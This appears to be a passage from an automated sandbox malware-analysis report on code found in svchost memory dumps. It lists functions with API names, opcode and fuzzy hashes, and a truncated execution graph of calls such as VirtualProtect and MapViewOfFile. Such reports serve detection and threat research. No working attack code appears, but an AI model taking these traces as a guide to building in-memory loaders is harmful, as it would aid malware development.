                                                                                                                                                  Function 00007DF4F3B62B48 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                  • Opcode ID: 3861752e6b5c76be2cebb9ad67872b18419a5ea734a6e2a755e753fd2cd8f93e
                                                                                                                                                  • Instruction ID: 8880a724e3f0aaaa32cc0004acdde3fcdd83425cfe899849af0e0c53a236ac48
                                                                                                                                                  • Opcode Fuzzy Hash: 3861752e6b5c76be2cebb9ad67872b18419a5ea734a6e2a755e753fd2cd8f93e
                                                                                                                                                  • Instruction Fuzzy Hash: C301A230A149098FEB54AB69DC9863673E6FF8D311B4840B9E84EC7146DA7AA8C1CB50
                                                                                                                                                  Function 00007DF4F3B62D94 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 10892065-0
                                                                                                                                                  • Opcode ID: f69c4423fc2f9dc24249204a85e6f753c59304eed0840573d92f1e176759654c
                                                                                                                                                  • Instruction ID: 78b96c15854fd075e6ba9fe66915bc44a0305ad87077cf124c4cd5fcf3bfb757
                                                                                                                                                  • Opcode Fuzzy Hash: f69c4423fc2f9dc24249204a85e6f753c59304eed0840573d92f1e176759654c
                                                                                                                                                  • Instruction Fuzzy Hash: 9EF0A021E099484AFB14AA7A6CB027621A1AF84320F9489FBD98FCA583D97988C15350
                                                                                                                                                  Function 00007DF4F3B73424 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressCallerProc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2663294120-0
                                                                                                                                                  • Opcode ID: b55f2987ccf9d47b878492792b43a4e8323f4fb48d1ec303df731e7bfe889620
                                                                                                                                                  • Instruction ID: bbb872b7e500ddd6079571dcf5ef2defce695d2c4e22c1b0f26d45cde89c350f
                                                                                                                                                  • Opcode Fuzzy Hash: b55f2987ccf9d47b878492792b43a4e8323f4fb48d1ec303df731e7bfe889620
                                                                                                                                                  • Instruction Fuzzy Hash: 37E0C211F08C0D1B6BA861AE28AC57B55D6CBDC23234402BBE41DC3296EC14CC810380
                                                                                                                                                  Function 00007DF4F3B90DCC Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                                  • Opcode ID: 4c721ddc8cb176db938021c85e5f400d5d7596dc62bee08ed1c2796866c985cb
                                                                                                                                                  • Instruction ID: 185d46c588ea2e4567bcae6b34181abe55dfdcdb206542bcc00ac7c0aea2c954
                                                                                                                                                  • Opcode Fuzzy Hash: 4c721ddc8cb176db938021c85e5f400d5d7596dc62bee08ed1c2796866c985cb
                                                                                                                                                  • Instruction Fuzzy Hash: 93E0C232B191240BE72C6ABD2C8917A36CAC7CC572B06827BFC06C3284DC68CC5602D0
                                                                                                                                                  Function 00007DF4F3B733F8 Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                  • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                                  • Instruction ID: 883a138bc9ab59a400f4a3b2ded8d80ebf1407eb6684ce9359614cda6abfff13
                                                                                                                                                  • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                                  • Instruction Fuzzy Hash: 22D05E20728D0D0BEB98662D1CB57365199EBDC321F9001BAE44EC2282E968CC950350
                                                                                                                                                  Function 00007DF4F3B75BD3 Relevance: 1.4, APIs: 1, Instructions: 150COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                  • Opcode ID: 463b73a7625b3d26a85ced48e1f81300b36ced1bdd07cd3e50a3669595497c86
                                                                                                                                                  • Instruction ID: 46fbf9912356b1c077075d286ae883891f73919e0bafde5be1ca88dc6875a142
                                                                                                                                                  • Opcode Fuzzy Hash: 463b73a7625b3d26a85ced48e1f81300b36ced1bdd07cd3e50a3669595497c86
                                                                                                                                                  • Instruction Fuzzy Hash: 9941213161CD488FDB94EF18C4A1AA673E1FF98310F5446AAD48EC7197DA34F985CB81
                                                                                                                                                  Function 00007DF4F3B7DA74 Relevance: 1.4, APIs: 1, Instructions: 147COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00007DF4F3B8E150: NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,00007DF4F3B8C0F7), ref: 00007DF4F3B8E160
                                                                                                                                                  • malloc.MSVCRT ref: 00007DF4F3B7DB44
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AcceptConnectPortmalloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3101135750-0
                                                                                                                                                  • Opcode ID: 5565b0a7f35f124f6bcd3fbf3053ca4a01fc296d0f2770306c12d9fdd2224762
                                                                                                                                                  • Instruction ID: 1f84fbac3d414488291d07a8750267175802d190e276875ba6dcd2918d7fd78b
                                                                                                                                                  • Opcode Fuzzy Hash: 5565b0a7f35f124f6bcd3fbf3053ca4a01fc296d0f2770306c12d9fdd2224762
                                                                                                                                                  • Instruction Fuzzy Hash: 78417F70508A4C8FDB64EF18D8997AA77E4FF58341F5001BAD84EC7252DE34E985CB92
                                                                                                                                                  Function 00007DF4F3B64F54 Relevance: 1.4, APIs: 1, Instructions: 126COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: malloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2803490479-0
                                                                                                                                                  • Opcode ID: 81c6eecad20e58c8d38abd6a23315df80df12776ef0665d00e4ffea17a923ccf
                                                                                                                                                  • Instruction ID: 7de833dc758ed1176f3fd4d8205f30f5e3bf09e76e122074dc3ba56d99945877
                                                                                                                                                  • Opcode Fuzzy Hash: 81c6eecad20e58c8d38abd6a23315df80df12776ef0665d00e4ffea17a923ccf
                                                                                                                                                  • Instruction Fuzzy Hash: 8631D031A0CE4A9FE718EB64D8659B6B3E4FF10350B4042AAD85FC2593EF24F89187C0
                                                                                                                                                  Function 00007DF4F3B7E560 Relevance: 1.3, APIs: 1, Instructions: 81COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                  • Opcode ID: 24d45a3551a768b3090c567df57a9186389bc8119604ba08ac45f82736c76157
                                                                                                                                                  • Instruction ID: 052d965616ac35374d55b23c264eb0948c67fde07e8af3683071e2be012b7c38
                                                                                                                                                  • Opcode Fuzzy Hash: 24d45a3551a768b3090c567df57a9186389bc8119604ba08ac45f82736c76157
                                                                                                                                                  • Instruction Fuzzy Hash: FF21A530618B0C5FDB58EF58D8999B577E4FF58711B40426ED44EC7262EA74E881C7C1
                                                                                                                                                  Function 00007DF4F3B851A0 Relevance: 1.3, APIs: 1, Instructions: 80COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: calloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2635317215-0
                                                                                                                                                  • Opcode ID: f9d8d64e7c2c4c7956bd9358d16aebce3c9b4a36e71dd88cc3658fe52e189f83
                                                                                                                                                  • Instruction ID: 069a0d44c3b7935d1ae3e8dafeaa176842907dd96096d05bc57938a603cee1de
                                                                                                                                                  • Opcode Fuzzy Hash: f9d8d64e7c2c4c7956bd9358d16aebce3c9b4a36e71dd88cc3658fe52e189f83
                                                                                                                                                  • Instruction Fuzzy Hash: 6F214230618A484FEB84EF68C8D57A673E5FF98311F9441B6980EC729BDE34D985CB90
                                                                                                                                                  Function 00007DF4F3B731B4 Relevance: 1.3, APIs: 1, Instructions: 71stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: lstrcmpi
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1586166983-0
                                                                                                                                                  • Opcode ID: 66b33f43179977e6021ab23a99b744e2774dbd865e09dbf7877d2203174fb5a6
                                                                                                                                                  • Instruction ID: 8c1e5734d3bc29c7a9e970f223efd192e84f339b47ba7d6a13de51ace82996e7
                                                                                                                                                  • Opcode Fuzzy Hash: 66b33f43179977e6021ab23a99b744e2774dbd865e09dbf7877d2203174fb5a6
                                                                                                                                                  • Instruction Fuzzy Hash: 27118730B045444BE798D77898B937736E1EF94201F9442BBD84FC2567EE289945D790
                                                                                                                                                  Function 00007DF4F3B7C868 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                  • Opcode ID: a647a70f472eec1f0232b607393523916aff4e703a7abd28a79881bfecac5ea9
                                                                                                                                                  • Instruction ID: 77ba6d6919aa42d98301f49ab2ab7e158edb8eba341aa2d90b18757216a39423
                                                                                                                                                  • Opcode Fuzzy Hash: a647a70f472eec1f0232b607393523916aff4e703a7abd28a79881bfecac5ea9
                                                                                                                                                  • Instruction Fuzzy Hash: 5901BB31618D4C8FDF98EB18C4D8E6573E5FBA8314B6445AAD40DCB24ADA35EC86CB50
                                                                                                                                                  Function 00007DF4F3B6272C Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                  • Opcode ID: 352c65fe592b7790d915c399a828791dec36a0441c5dd9355c9a9937d9e241a1
                                                                                                                                                  • Instruction ID: eb929ac976e02dc0f412db2e6bcc91b79dce17c110f5f44005adeb81bb276dfa
                                                                                                                                                  • Opcode Fuzzy Hash: 352c65fe592b7790d915c399a828791dec36a0441c5dd9355c9a9937d9e241a1
                                                                                                                                                  • Instruction Fuzzy Hash: C8011730E18D4A8BEB58DB2C9865A3632F1FF5831579481FED05ECB6D2DA29DC828741
                                                                                                                                                  Function 00007DF4F3CAE003 Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2995812443.00007DF4F3CAE000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3CAE000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3cae000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                  • Opcode ID: 96b62db58244428d6a64d9046a594f9ff996be7dc69b7f1caddc712a1833717b
                                                                                                                                                  • Instruction ID: 3777450332470a5e9552b12a4923ac546876d4520312dfd412e26d7e37c79b52
                                                                                                                                                  • Opcode Fuzzy Hash: 96b62db58244428d6a64d9046a594f9ff996be7dc69b7f1caddc712a1833717b
                                                                                                                                                  • Instruction Fuzzy Hash: 4AF08930A1CD089FDFA8FB2EC895E5173E2FB9C310B40855AE44DC3665E924E895CBC6
                                                                                                                                                  Function 00007DF4F3B64090 Relevance: 1.3, APIs: 1, Instructions: 40COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: calloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2635317215-0
                                                                                                                                                  • Opcode ID: de320a19c5c687e61a4a128f89672fe303437e4185c336a85925eb16b6c1a1ac
                                                                                                                                                  • Instruction ID: 237e3f5ea4eaca95b7355742d41286bbf7d14500211071f3444e3e8623d17946
                                                                                                                                                  • Opcode Fuzzy Hash: de320a19c5c687e61a4a128f89672fe303437e4185c336a85925eb16b6c1a1ac
                                                                                                                                                  • Instruction Fuzzy Hash: 12F05E30A14D0A4FF784AB2898A8B7676E4EF98341F9440B6D90AC62A1DE78CC95D740
                                                                                                                                                  Function 00007DF4F3BC3A10 Relevance: 1.3, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                  • Opcode ID: ceb1b3ac1685b1e70d1ec6c741c6d46ebc4cdc23072f6723e1ceb22e799d32bf
                                                                                                                                                  • Instruction ID: 003059c0d0a1ff497c3a5026c129dfe0b9bf42c7515b1ec2857803e27d93f973
                                                                                                                                                  • Opcode Fuzzy Hash: ceb1b3ac1685b1e70d1ec6c741c6d46ebc4cdc23072f6723e1ceb22e799d32bf
                                                                                                                                                  • Instruction Fuzzy Hash: CBF0443061B94ACBFF6CA76598B863977E0EF14302B84006BF84FC11A1CB2CD4949722
                                                                                                                                                  Function 00007DF4F3B90FC4 Relevance: 1.3, APIs: 1, Instructions: 26COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: malloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2803490479-0
                                                                                                                                                  • Opcode ID: 803f3e239e71c094a11688905a13a5b4d70b1f6a51e1afa360838daebce55db3
                                                                                                                                                  • Instruction ID: a518cdd493aee391c804e6677a6cfe3957f669bed7c4b23cfded071f9aab4ada
                                                                                                                                                  • Opcode Fuzzy Hash: 803f3e239e71c094a11688905a13a5b4d70b1f6a51e1afa360838daebce55db3
                                                                                                                                                  • Instruction Fuzzy Hash: 19D0A750B16D0D0FBB58667F1CAD63A21D5DBEC12278801B7FC0DC2252EC29CCC54360
                                                                                                                                                  Function 00007DF4F3B87740 Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                  • Opcode ID: 71969f7ba82f040737c07892c75cbb6ddbbd8e0156a438f90a0ebcf422641aac
                                                                                                                                                  • Instruction ID: e4a67b9cfd71f4f8a65b784cbad192f4d3f337be626cd45bece25068c79e2ca1
                                                                                                                                                  • Opcode Fuzzy Hash: 71969f7ba82f040737c07892c75cbb6ddbbd8e0156a438f90a0ebcf422641aac
                                                                                                                                                  • Instruction Fuzzy Hash: 8BE08C3451590A8FEF88EB38C9697AA32E0FF08308FD404A9C00EC32D0E63DD881C701
                                                                                                                                                  Function 00007DF4F3B6FF84 Relevance: 1.3, APIs: 1, Instructions: 17COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: malloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2803490479-0
                                                                                                                                                  • Opcode ID: ed35e0f212f0a254e6baa594bb9cd44b71b95e4339f86f8b9042d1b76f972d3e
                                                                                                                                                  • Instruction ID: 91bb2e75f36b631e82b40bc2cff101b95ef865eb3291cbeaa71b08c0b1d2fb27
                                                                                                                                                  • Opcode Fuzzy Hash: ed35e0f212f0a254e6baa594bb9cd44b71b95e4339f86f8b9042d1b76f972d3e
                                                                                                                                                  • Instruction Fuzzy Hash: 86D01210B0AD092BBB5036FA1C9C53625D4DB282237100062F819C0161EA48C9D0D312
                                                                                                                                                  Function 00007DF4F3B64D90 Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                  • Opcode ID: 3ab7e135269a5abfd494e29a849e8a7504a641c2ba0334102f1d09b8f57cd51c
                                                                                                                                                  • Instruction ID: 5ff08be400c1c339669901b502676b95b188c12b998474c8eb179e260a8f17db
                                                                                                                                                  • Opcode Fuzzy Hash: 3ab7e135269a5abfd494e29a849e8a7504a641c2ba0334102f1d09b8f57cd51c
                                                                                                                                                  • Instruction Fuzzy Hash: 77B09228C1ACEB02EE5837B64C6A02A2460AF04201FC40099A81AC0452E61C84948242

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 0000022C9E060511 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2983894633.0000022C9E060000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022C9E060000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_22c9e060000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                                                  • Instruction ID: 1684949b0e2b346c4f6e13502068689c61c9b2d028cdf62c4328b71d82623ec0
                                                                                                                                                  • Opcode Fuzzy Hash: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                                                  • Instruction Fuzzy Hash: CFB01130E2AA00C2E3880E0AB8023A0F2B2C30B300F02B2322002F3220CA28CC08028F
                                                                                                                                                  Function 00007DF4F3B91741 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b5b40462eea7a53d4f43fef84958c55854cf61dddd4c725374532822cf4ebc6c
                                                                                                                                                  • Instruction ID: 6b5de7765083f1fcecf79d76d96fc317e58b19ab22377307484a88b0d29399c3
                                                                                                                                                  • Opcode Fuzzy Hash: b5b40462eea7a53d4f43fef84958c55854cf61dddd4c725374532822cf4ebc6c
                                                                                                                                                  • Instruction Fuzzy Hash: B4B01122E2880082C2080E0AB802330F2B2C30B300F003030200AF3A20C8A0CC802ACF

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:4.3%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:24.3%
                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                  Total number of Nodes:305
                                                                                                                                                  Total number of Limit Nodes:31
                                                                                                                                                  execution_graph 33371 17161855918 33374 17161856c68 33371->33374 33373 1716185592a 33375 17161856c71 33374->33375 33382 17161856d54 33374->33382 33375->33382 33385 17161863218 33375->33385 33377 17161856d06 33377->33382 33393 17161853c88 33377->33393 33379 17161856d12 33380 17161856d29 SetErrorMode 33379->33380 33381 17161856d42 33380->33381 33384 17161856d6c 33380->33384 33381->33382 33397 171618569ec 33381->33397 33382->33373 33384->33373 33387 17161863265 33385->33387 33386 171618642a6 33386->33377 33387->33386 33388 17161863d5a RtlFormatCurrentUserKeyPath 33387->33388 33389 17161863d66 33387->33389 33388->33389 33389->33386 33390 17161863eab calloc 33389->33390 33390->33386 33391 17161863ed1 33390->33391 33391->33386 33413 1716185563c 6 API calls 33391->33413 33394 17161853c95 33393->33394 33395 17161853cbb 33393->33395 33394->33395 33396 17161853c9b RtlAddFunctionTable 33394->33396 33395->33379 33396->33395 33398 171618569f5 33397->33398 33400 17161856a68 33397->33400 33399 17161856acd 33398->33399 33402 17161856a21 33398->33402 33437 1716186105c 16 API calls 33399->33437 33400->33382 33402->33400 33403 17161856a3d 33402->33403 33404 17161856a99 33402->33404 33405 17161856a42 33403->33405 33406 17161856a8c 33403->33406 33436 171618616c8 13 API calls 33404->33436 33409 17161856a77 33405->33409 33410 17161856a47 33405->33410 33435 17161861188 16 API calls 33406->33435 33434 171618612bc 18 API calls 33409->33434 33410->33400 33414 1716185d7c0 33410->33414 33413->33386 33415 1716185d7e0 33414->33415 33416 1716185d85f CloseHandle 33415->33416 33417 1716185d7fb MapViewOfFile 33415->33417 33418 1716185d871 33416->33418 33419 1716185d92b 33416->33419 33425 1716185d825 33417->33425 33418->33419 33438 17161852b54 33418->33438 33459 1716185a9d4 33419->33459 33423 1716185d881 33423->33419 33442 1716185e2a8 33423->33442 33425->33416 33428 1716185d893 33451 1716185d3b4 6 API calls 33428->33451 33430 1716185d898 33452 171618579a0 33430->33452 33432 1716185d8e7 33458 17161852ba8 6 API calls 33432->33458 33434->33400 33435->33400 33436->33400 33437->33400 33439 17161852b64 33438->33439 33440 17161852b6d HeapCreate 33439->33440 33441 17161852b86 33439->33441 33440->33441 33441->33423 33443 1716185e2c0 33442->33443 33444 1716185e30a 33443->33444 33464 17161852c24 33443->33464 33445 1716185e317 VirtualProtect 33444->33445 33446 1716185d88e 33444->33446 33468 17161851000 33445->33468 33450 1716185e1dc GetSystemInfo VirtualAlloc 33446->33450 33449 1716185e344 VirtualProtect 33449->33446 33450->33428 33451->33430 33455 171618579ce 33452->33455 33453 17161857c40 33453->33432 33454 1716185a9d4 2 API calls 33454->33453 33455->33453 33457 17161857b8e 33455->33457 33477 171618577dc 33455->33477 33457->33454 33458->33419 33460 1716185a9e7 free 33459->33460 33461 1716185a9f8 33459->33461 33460->33460 33460->33461 33462 1716185aa17 33461->33462 33463 1716185aa02 free 33461->33463 33462->33400 33463->33462 33463->33463 33465 17161852c52 33464->33465 33467 17161852cbc 33465->33467 33470 171618524c4 33465->33470 33467->33444 33469 1716185100c 33468->33469 33469->33449 33473 